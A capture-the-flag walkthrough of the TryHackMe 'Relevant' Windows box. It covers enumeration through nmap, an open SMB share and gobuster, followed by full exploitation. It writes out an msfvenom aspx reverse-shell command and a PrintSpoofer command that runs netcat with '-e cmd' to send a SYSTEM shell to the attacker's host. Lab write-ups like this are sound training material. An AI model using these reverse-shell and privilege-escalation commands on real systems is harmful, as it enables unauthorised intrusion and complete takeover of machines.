TryHackMe: Relevant — Walkthrough
This article aims to walk you through Relevant box produced by The Mayor and hosted on TryHackMe. Anyone who has access to TryHackMe can try to pwn this Windows box, this is an intermediate and fun box. The creator of this box wants all practitioners to approach this box as a real life penetration testing. Hope you enjoy reading the walkthrough!
First of all, we are going to start the box after accessing the relevant page.
Waiting for a while, we are provided with IP address of the box, so we will scan it via Nmap.
We are going to scan the IP for all open ports by typing the following command on our terminal. -p- indicates that we want to check all open ports.
nmap -p- 10.10.x.x
After waiting for a while, we have got our results as shown below:
From open ports found by nmap, we understand that it is a Windows box. To gather further information on ports found by nmap, we will add some more arguments specifying open ports. -sV will scan to show service versions of applications on open ports, and -sC will run default scripts on services in order to check whether there is a vulnerability.
nmap -p 80,135,139,445,3389,49663,49667,49669 10.10.x.x -sV -sC
In a short while, we have got our results and more details regarding open ports. And we decide to start enumeration on SMB ports and we will go on enumeration on other ports since we have two http servers.
We list SMB shares on the target box as follows and we get some results.
smbclient -L 10.10.x.x
We discover that there is a shared Disk on the SMB server called nt4wrksv, and we will try to connect to enumerate it further.
We are able to connect to the server without credentials. Now, we will enumerate this Disk to see we have something useful.
We come across a passwords.txt file, which may gives us credentials to RDP to the box or login on the HTTP servers. We get the file and read the password.txt file.
We see that there are two strings in it, and these strings are base64 encoded, so we decode them and get two users and two passwords for each user.
Now we will try to connect to the target box to be able to execute commands remotely via psexec.
We have an error while using the first credentials we found on SMB server.
We try other credentials and we are not able to be authenticated on the server.
We also try to RDP into the box since port 3389 is open, but credentials do not work for RDP connection as well.
Now we will try to enumerate further on HTTP servers we found during information gathering on the box.
We check HTTP server on port 80, and we try to bruteforce directories with gobuster; however, there is nothing of use for us. So, we now move on the other HTTP server on port 49663 to see we have something there to get a low shell on the box.
We see that it is again an IIS server, and we bruteforce the server for directory discovery with gobuster. Arguments we use for bruteforce indicates that we want gobuster to just show directories with 200 and 301 status (it sometimes does not work properly), and it should also exclude errors and to be faster we specify threads as 50.
gobsuter dir -u http/10.10.x.x:49663 -w directory-list-2.3-medium.txt -s ‘200,301’ — no-error -t 50
We discover an interesting directory because we have seen nt4wrksv directory on SMB server as well. We should carefully enumerate further since it may be the path to low shell on the system.
We type it following the URL and we see nothing, so we will add password.txt file to the end of the URL as it includes base64 strings and they may appear on the browser, if they appear, it means that we can upload a reverse shell on SMB server and execute it to get a reverse shell.
As it is seen, we are now ready to exploit the server.
We create a reverse shell with .aspx extension file to execute it on the IIS server. So we will use msfvenom to create our reverse shell as follows:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.x.x.x LPORT=443 -f aspx > relevant.aspx
We specify that we want our exploit to be windows executable, send connection to our Local host on Local port we defined, and file type should be aspx.
Then, we upload our reverse shell on the SMB server.
We set up a netcat listener on our terminal to get the reverse conncetion.
Now, we curl the URL indicating the place of our reverse shell on the server to execute it.
As it is seen, now we have a low shell on the target box and we are going to get our low shell hash.
We enumerate the machine to find weak services and files on the server.
After enumerating the box for a while, we discover that SeImpersonatePrivilege is enabled for our current user, which means that we are able to abuse this to get full authority on the server.
We try to use two popular potato attacks, but we could not execute commands on the box since DCOM is disabled on the box which prevents our attacks, and there are no tokens to impersonate.
In this case, we google and see that we are able to abuse SeImpersonatePrivilege with a newer exploit called PrintSpoofer, instead of compiling it, we search for an already compiled one (it is not recommended as there may be exploits compiled intentionally for evil purposes) and found on github, we see that the creator of the box, shared compiled exploit, so we are good to go.
After uploading the exploit via SMB server, we will upload netcat windows binary since we will try to get a reverse shell as root.
And uploading netcat windows binary.
Now we are ready to escalate our privilege on the server. So we will set up another netcat listener on another terminal.
With the following command, we execute netcat binary we uploaded on the server to get a reverse shell.
PrintSpoofer.exe -c “c:\inetpub\wwwroot\nt4wrksv\nc.exe 10.x.x.x 443 -e cmd”
After executing the command on the low shell terminal, we check our netcat listener and we have got a shell as NT Authrotiy on the system.
Now, it is time to get root hash.
Now we have full authority on the box. Enjoy!
Extract patchs and updates Architecture List all env variables List all drives Get current username List user privilege…
Server Message Block - Wikipedia
In computer networking, Server Message Block ( SMB), one version of which was also known as Common Internet File System…
From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019. For more…
Everything You Wanted to know About Psexec
FuzzySecurity | Windows Privilege Escalation Fundamentals
Not many people talk about serious Windows privilege escalation which is a shame. I think the reasons for this are…
TryHackMe | Cyber Security Training
TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your…
Nmap: the Network Mapper - Free Security Scanner
Nmap 7.90 has been released with Npcap 1.00 along with dozens of other performance improvements, bug fixes, and feature…